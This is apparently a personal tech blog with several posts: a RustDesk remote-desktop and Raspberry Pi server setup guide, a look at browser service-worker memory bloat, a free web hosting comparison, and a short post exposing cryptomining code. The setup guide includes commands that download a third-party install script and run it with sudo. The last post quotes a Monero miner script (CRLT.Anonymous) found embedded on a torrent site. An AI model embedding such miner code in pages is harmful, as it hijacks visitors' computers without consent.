Saturday, December 30, 2023

Goodbye Teamviewer, Hello RustDesk!

Sometime in the last month TeamViewer has dropped their free for personal use policy, or changed the algorithm it uses to detect commercial use.  It now requires a minimum of $298.80/year (with auto-renewal) for a single license.  I've been using TeamViewer to help friends and relatives with computer problems for many years, so this started me on a bit of exploration of the alternatives.  The TeamViewer Reddit threads about this indicate that many others are frustrated with this change as well, and like me, were surprised at the change made without prior notice.  After having similar problems with many major TeamViewer releases, and not liking the new interface, I've decided it's time to look for something better.
Former TeamViewer promise to keep it free for personal use.

After looking at several alternatives, one stood out from the rest as the basic portions are free and open source!  Giving it a quick try I found it even easier than TeamViewer to use, as the person I'm trying to help can just accept the connection without having to tell me the password several times, or use words like bravo, or Victor to distinguish similar sounding letters like b, d, g, p, t and v.

This alternative is RustDesk, which you can download here.  You'll find the most common system install links just under the big colorful scam warning telling you not to install this software on the advice of someone you don't know well and trust.

As switching remote desktop tools can be a bit confusing, I'd like to share what I've learned in my initial use of the RustDesk client, and the community level RustDesk Server.  I will also be sharing my experience with RustDesk at the January 18, 2024 Champaign-Urbana Computer Users Group meeting.

While the terms client and server are used in different ways in different contexts (like with Virtual Network Computing: VNC), RustDesk uses them as most end-users would think of them.  A client, like a web browser is something you run on your computer that accesses servers in the cloud (e.g. in a data center) and the default servers managed by RustDesk are in several data centers world wide.

Here is a screenshot of the Windows RustDesk client version 1.2.3 released 2023-10-13 with the free (noted in green or orange) and paid (noted in red) features annotated:
Everything necessary to help someone who can install the client for themselves is available with just a client installed at each end.  Connecting is even easier than TeamViewer, as the person being helped can just accept the connection after sharing their ID, rather than reading the password to the helper.

If you want to access your own systems remotely, you'll need a permanent password.  That can be accomplished by running your own server, entering the hostname (e.g. rustdesk.example.com) and the server key in the Network settings, and then the password in Security settings.
When I want to help someone who doesn't need a stored password on my server, I just erase my server information before that session, and then paste it back in afterward to access my own systems.  I have found the free ArsClip clipboard manager handy for this.



Due to the 4K high resolution display I normally use, I prefer to change the "Default view style" from "Scale original" to "Scale adaptive" in the Display settings.
After starting with the Windows client, it took me a little time to find the settings in the Linux client as I'd gotten used to the hamburger menu in the upper right.  This client does not have a consistent user interface, and only offers settings via the three dots near the client ID.
I don't understand this, but the above screen shot was taken on my Windows system viewing my Linux client on the rpi with the RustDesk server being used, but the status indicated it was not connected to the server on the same system as the client!  Is this some weird issue with the way my old router does NAT?

I have several systems at home that I want to monitor when I'm away, so I've installed the free server on my rpi (Raspberry Pi 4 Model B) to connect via a permanent password.  I also help several people who have lost their vision late in life, and don't know how to use a screen reader.  For them it is easiest if I can take control of their computer when they call me for help.

If this does not prove reliable enough, I may need to consider spending $4 or $5 a month for a virtual private server (VPS) to host the service in a real data center with a static IP address.

Setting up a server for an average user is not a trivial task as it requires an understanding of many details like DNS, security, firewalls, port forwarding through NAT, etc.  I made quite a few mistakes along the way, and will share a few to perhaps fill in some of the gaps in the RustDesk documentation.

I installed docker on my system thinking it was required, and then decided I didn't really need it.

The next thing I did was download and install the client and then followed these server install instructions on my rpi.   This involved downloading two files with curl, installing the client with apt install, and running the 2nd to configure the server.  After several tries where curl just gave me a zero byte length file for the client, I just downloaded it with Firefox, and that worked fine.  Later I was told to add the L option to follow local location redirects, which solves that problem.

The 2nd one was not a problem.  These are the install commands/files that were current at the time for my Raspberry Pi 4, with -O updated to -OL.
curl -OL https://github.com/rustdesk/rustdesk/releases/download/1.2.3/rustdesk-1.2.3-armv7-sciter.deb
sudo apt install -f ./rustdesk-1.2.3-armv7-sciter.deb
curl -O https://raw.githubusercontent.com/techahold/rustdeskinstall/master/install.sh
chmod +x install.sh
sudo ./install.sh
Except for having to download rustdesk-1.2.3-armv7-sciter.deb with Firefox instead of curl, this worked, and gave me my server key to use with my subdomain name.  Then all I had to do was enter the ports to forward in my router.

The first problem I had was that I chose to use one of my own domains to use for a server name.  I've been retired from IT work for almost two decades, so I haven't had to think about DNS details in a long time.  Most of the time software like cPanel or Let's Encrypt takes care of the niggly details for me.  I use an inexpensive hosting service (which I highly recommend) that like many, with rising license fees has switched from cPanel to DirectAdmin.  The one thing cPanel really does better is dynamic DNS updates of A records for a subdomain.  I tried in vain to get the DirectAdmin scripts for this I could find online to work, but even with AI code generation to help, I couldn't.  I was afraid to run the install script a 2nd time, as I don't know if it'll only work as a fresh install.

For days I was stumped at how to solve this problem until I read this in a help item at freedns.afraid.org which said: "If you ... have multiple hostnames to update, you can leave 1 of them an A record, and make the rest of them CNAME's so you do not have to issue multiple updates each time."  I had set up my RustDesk server to use my own domain name rather than the one FREE DNS gives me.  I had totally forgotten that I didn't need to dynamically update it with DirectAdmin, as I could just use a CNAME DNS record that points to my free DDNS name!  The moral of the story is to get your DNS working for the server name before installing the server.

I could not find any detailed server administration documentation for the free server, except for a user provided set of uninstall commands.

As this diagram from a ham radio blog about configuring the Windows RustDesk server points out, it avoids LAN/WAN route confusion if you can put your server on a VPS rather than a home Raspberry Pi 4 as I did.
I still haven't found the right settings in my old ASUS router to make the NAT performance better on my home network.  The article suggests using a DNS feature of the router, but mine doesn't have that.  I can probably use a Static Route for my LAN instead, but I've not tried that yet as that involves more details to look up!  I also wonder if it'd help to put my private IP address in the rpi hosts file?

Even though connections to my rpi running both the server and client often require many attempts, this setup seems to work pretty well for all other hosts I've tried.

References:
rustdesk/rustdesk · Discussions · GitHub

Alternative remote help software includes:
DWService - web-based remote access, remote administration, remote support
                    See also: Computer Remote Control using DWService
Chrome Remote Desktop (Does not help you track your remote passwords easily.)

AnyDesk (3 managed devices at the free level)


Sunday, December 29, 2019

Browser Bloat & Service Workers


Contents  

  1. Introduction
  2. Which Browsers use Service Workers?
  3. See Service Workers
  4. Service Worker Functions
  5. Push Notifications
  6. Check Memory Use
  7. Freeing Memory
    1. Subframes
    2. JavaScript
    3. Memory Monitoring
    4. Manage Extensions
    5. Exclude Extensions from Sync
    6. Restart Your Browser Often
  8. Remove or Block Service Workers
  9. Security Considerations
  10. What are the long term solutions?
  11. Footnotes and Reference Links

1. Introduction

We know multiple tabs and extensions in our browsers use additional memory and CPU resources, but did you know most web sites you visit now install JavaScript programs, with out your knowledge or consent, called service workers to do things like place ads on your desktop your ad blocker usually can't stop, and these service workers are each run in their own system process with all the memory and system overhead that entails? These programs can even run after you close the tab or site that installed them, and some restart every time you launch your web browser.

About two weeks ago I launched my Chrome browser, and noticed once again I got a desktop notification ad from a company I ordered something from once. This ad was starting to pop up every time I opened my browser, despite running an ad blocker. I consider desktop notification ads to be particularly annoying, so I opened developer tools, and unregistered the service worker for that site, and a bunch of others from sites I almost never visit, and don't want offline content from. I used Process Hacker to note that Chrome memory usage dropped from about 2.5Gb to 1.1Gb, and with each service worker I deleted, one Chrome process thread went away. While I could have stopped this ad by changing the notification setting for this site, I had no idea the service workers in my browser took so much space!

Some sites like AliExpress had a service worker for each store I'd visited in that site! After restarting the browser, that annoying ad was gone! I repeated this on my Chromebooks and the nasty freezes where the cursor would not move, or barely moved with my track-pad have not happened since.

This started weeks of reading up on service workers, subframes, browser and virtual memory management, leading to some conclusions I think every one who uses a web browser should know.

2. Which Browsers use Service Workers?

All major web browsers (including Chrome 45+, Firefox 44+, Edge 17+, Safari 11.1+) support service workers1. This includes Chromium based browsers such as Blisk, Brave, Epic, Opera, Slimjet, Vivaldi, etc.  Firefox seems to be the only one that allows a user to disable service workers for all sites. The Tor browser 9.02 based on Firefox 68.3.0ESR (Extended Support Release), Basilisk, Pale Moon, and all Firefox ESR releases to date have service workers disabled by default. Service worker memory bloat does not seem to be an issue on mobile operating systems such as Android or IOS as they don't seem to stay in memory when not in use.

3. See Service Workers

There are several ways to see if you have service workers in your browser. In Chrome, and Chromium based browsers, open a new tab and go to the url: chrome://serviceworker-internals/. In Firefox, use about:serviceworkers. In Edge, use the developer tools, which works in all the other browsers as well, for an individual site.

Here is an example chrome://serviceworker-internals tab in Opera:

In Chrome the above works as well as the Developer tools Application tab:


In Microsoft Edge, there was only the Service Workers tab in developer tools:
As of January 15, 2020 Edge based on Chromium provides the same chrome://serviceworker-internals/ URL as other Chrome browsers.

I don't have access to a Mac, so all I can tell you about Safari, is how to enable the developer tools.

4. Service Worker Functions

Service workers can dramatically speed up the loading of a web page, allow the browser to present parts of a page before all the elements have loaded, add offline functionality like offline reading or editing (as with Gmail or Google Docs), conserve bandwidth, and provide notifications (or ads) even when the page is not loaded.  Additional examples are in the footnotes2, including an example service worker with a polite opt-in checkbox3

5. Push Notifications

Push notifications are the one feature of service workers most likely to be abused4. Here are some requests from a blog site5 that asked permission to allow notifications.

What they don't tell you is this also allows them to leave a service worker in your browser for a long time, that can persist after reboots.  If you want to revoke this permission, the easiest way is to use the site settings.  This works in most browsers, just click the icon left of the URL (web address) you are visiting, and select block or Ask by Notifications.  (Navigate to Site settings if you don't see that.)  Please see Allow Website Notifications POP-UP Scam for detailed instructions for popular browsers.

6. Check Memory Use

Most operating systems (like Windows6,7) and browsers (like Chrome8 and Firefox9) provide a task manager to show the resource consumption (CPU, memory, etc.) of system processes.  The browser task managers have the advantage of showing which feature (tab, extension, service worker, or subframe etc.) is associated with a process.  (Chrome used to compare its total to other browsers, but that feature was dropped a long time ago.)

Here is an image of the Chrome task manager running under Windows 10 with an AMD Radeon RX 550 graphics card with 4GB of ram.  Note how much larger the GPU process is than the Browser:
Also note the Gmail service worker highlighted in blue.  This is what allows you to continue reading recent email messages after loading your inbox even if your connection drops.  Note the service worker memory footprint is also larger than other extensions and tabs in this example.

Let's look at another task list when visiting https://www.wunderground.com/.
Notice there are 10 processes labeled Subframe highlighted below the weather tab.  These are all portions of that page that come from other sites.  For several reasons Chrome isolates each portion of the page into a separate process.

7. Freeing Memory

Now how do we get back some of the memory all these things take up in our browser?

7.1 Subframes

Let's start with those subframes we were just looking at. The ad blocker running when that was taken was uBlock Origin with default settings. According to this reddit discussion Privacy Badger does a better job of blocking these. Let's see what happens when we switch to that:
This cut the subframes from 10 to 2, and based on their names, I'd guess at least one provides useful content on the page.  Privacy Badger also has a lower memory footprint than uBlock Origin.

7.2 JavaScript

Here is a memory footprint of Chrome running with the  --process-per-site option:
Note how all the tabs have one memory footprint together, but still account for about 1.4Gb of the browser memory.

Here are about the same tabs loaded after blocking Javascript on just the W3Schools site.
Not many sites are functional without Javascript, however this works fine if you're just looking up some syntax details on W3Schools.  If you like switching between many tabs, you might use site settings or an add-on like NoScript, or JavaScript Switcher to turn off JavaScript when possible to save memory.  (Note Mozilla moved Firefox JavaScript controls from the options menu to about:config in 2013.)

7.3 Memory Monitoring

Besides the task managers, memory monitors are handy to provide early warning when memory is running out.  I compared the five memory monitors in the chrome web store and found the one offered by: pd4d10 about tied for lowest memory footprint with the one offered by: dan.belz69.  I prefer the tooltip detail in the former, and wish the later did a restart rather than a refresh on click.

Unfortunately, I have not seen any sites that provide memory footprints for extensions or add-ons.
I simply watched these five in the Chrome task manager to get a feel for their size variations over time.  A more rigorous approach can be found in this comparison of uBlock and ABP.

7.4 Manage Extensions

On reading the article above, I learned that extensions not only took up space themselves, but many increased the size of every tab loaded in the browser.  I found that I could regain a great deal of memory by simply disabling extensions in Chrome and Firefox that I'm not using until I need them. For example, now I only enable LastPass (who's degraded functionality has me looking at alternatives) when I change a password, or register one on a new site.  This takes a bit longer.  I sure would like to see disable added to the remove and hide menus in the extension icon right-click menu in Chrome.  [Note to self, figure out where best to submit that idea.]

Now when I add and extension, I also consider the cost-benefit in terms of memory footprint.  It is also useful to review browser features, and possibly choose a browser that has features previously only available as extensions built into the browser, like the ad blocking in Brave.

7.5 Exclude Extensions from Sync

After taking inventory of my extensions, I found I had many that I had played with once on one computer that were replicated on many others.  For this reason, I think it is wise to disable sync of extensions in Firefox and Chrome, and manually add them on each system they are used.  This is especially important for Chromebook users.

7.6 Restart Your Browser Often

All browsers seem to take more memory the longer they run.  Closing and restarting the browser can free up wasted memory.  Chrome has a debug url chrome://restart which will restart your browser and keep your current tabs.  This is especially handy on Chromebooks as you can free up memory with out having to log into the Chromebook again!

8. Remove or Block Them

Before removing (unregistering) a service worker, consider that it may be hard to get back. Once unregistered, the browser remembers that decision so it may be hard to change your mind later. Most service workers perform their job quickly, and don't hang around in memory. Therefore, I'd try removing the unwanted persistent ones first by blocking notifications.  Then I would close the browser, wait a minute or two, then re-open it with nothing but a blank tab like about:blank, and then see if any persistent  memory hogs are left.

In Firefox you can block all service workers with the about:config setting  dom.serviceWorkers.enabled.  In Chrome (and related browsers) there is the Block Service Workers extension that will prompt you before allowing a service worker to run.  I suggest limiting the number of sites you allow to use notifications to a few whose notifications are most useful.

9. Security Considerations

In Chrome 67 Site Isolation was added to defend against web attacks like Spectre and Meltdown, adding another 10 to 13% to the memory footprint. This is one reason multi process browsers are safer than single process browsers like Basilisk and Pale Moon, but at a cost of much larger memory use.

Search the web for "MarioNet attack" and you'll find many articles describing undesirable activities service workers could do.  This paper says it isn't a big problem because a "Service Worker can stay alive only for about one minute after the user navigates away from the website".  However, I do not believe this is true if you allow notifications on the site that installs the service worker, and there are many ways a site can nag or trick you into doing so.

10. What are the long term solutions?

Since the early days of the Internet, there has been a constant battle between advertisers, spammers and shoppers for control of their online experience and system resources.  One of the factors that lead to early Google search engine popularity was that ads were simple and fast plain text links instead of images.  Most web developers are paid by the corporations who profit from ads, so are highly motivated to design pages with eye catching video and interactive features that make it almost impossible to block all unwanted content.  Advertisers now detect and block ad blockers, and programmers are responding with anti-blocker blockers.  The EU tried to regulate cookie use, but the laws only resulted in "agree or leave notices" on websites, and more subtle tracking and super cookies.  Merchandisers bribe shoppers with discounts to install their app which can more easily nag you and violate your privacy, and personal assistants spy on conversations so AI can guess what ads to serve next.

What might change in the future?  Will operating systems be re-designed so that the browser will be more closely integrated with virtual memory management?  This seems to already be an advantage of mobile device operating system event driven tasking.  Will web standards integrate some basic functions typically used in JavaScript into CSS or will new funding schemes like Basic Attention Tokens (BAT) help solve the ad battle?  How about bringing back plain text ads linking to ad content with out loading it on the current page?

Will web scraping evolve into meta browsers that scrape what you want off a page, and display a static snapshot until you want to interact with a page again?  Could we see something like dynamic link libraries for browsers to re-use common JavaScript code?  Will stand alone programs that don't require the overhead of the browser make a come back?

Please leave your ideas in the comments!

11. Footnotes and Reference Links

Are Browser Extensions Slowing You Down? - Make Tech Easier

Using the Chrome Task Manager to Find In-Browser Miners

Get an Ad Blocker | Protect Against Websites That Spy - Consumer Reports
  1. Can I use... Service Workers, etc
  2. ServiceWorker Cookbook (with detailed function examples for developers)
  3. Taking the web offline with service workers - mobiForge
  4. Browser push notifications: a feature asking to be abused - Malwarebytes Labs
  5. Example Blog Post that Requests Notifications
  6. Beginner Geek: What Every Windows User Needs to Know About Using the Windows Task Manager
  7. Windows Task Manager: The Complete Guide
  8. How to Use Chrome’s Built-In Task Manager
  9. Task Manager: see what tabs or extensions are slowing down Firefox


  10. Task Manager - see what tabs or extensions are slowing down Firefox | Firefox Help
  11. Service Worker Security FAQ: Why doesn’t Chrome prompt the user before registering a Service Worker?
  12. Debug Background Services With Chrome DevTools
  13. Turn notifications on or off - Computer - Google Chrome Help
  14. Does service worker runs on background even if browser is closed? - Stack Overflow

  15. Last update: 1/16/2020

Saturday, March 9, 2019

Free Web Hosting Services

Have you ever created a little website for an event or group at a bargain introductory price, and then forgotten about it until you notice huge recurring charges applied to your credit card?  I have, so now I stay away from introductory pricing on web sites.  A few years back there seemed to be dozens of places to host a web site for free, but now there are few choices for general purpose sites with rich site building features that don't have some kind of catch or gotcha to get you to upgrade to a premium plan.

I've looked at a number of pages like this one that lists free hosting services, but they never seem to reveal the catch or gotcha I'd care about for each provider.
So after trying a few services, and finding the gotchas, I thought I'd start a spreadsheet to track this.  Please add information about your favorite free or really cheap hosting sites in the comments, or let me know of any similar comparison charts already out there!  Should there be other features important enough to include in the summary like cron jobs, or number of ftp accounts?

You can share this sheet, or view all sheets, with this link: http://bit.ly/freewebh

This is one of the topics I covered in a WordPress talk for CUCUG, and will expand on for RCSI in May.  Please share your thoughts in the comments.

Please share this post with the shortlink: http://bit.ly/CompareFreeHosting

P.S.  I also have a sheet for comparing cheap mobile plans.

Since posting this, many new options have become available besides traditional hosting accounts.  See:

Wednesday, February 13, 2019

TPB mining again

I was helping someone today who was visiting thepiratebay.org, and looking at the source code of the page to troubleshoot an ad-blocker when I ran across this:

<script>
  var miner=new CRLT.Anonymous('37efd635d0ec154de4d0b17dd1952aa3b5e88acd6bbe', {
    threads:4,throttle:0.5, coin: "xmr",
  });
  miner.start();
</script>

Now there's a good reason to block JavaScript on this site!!!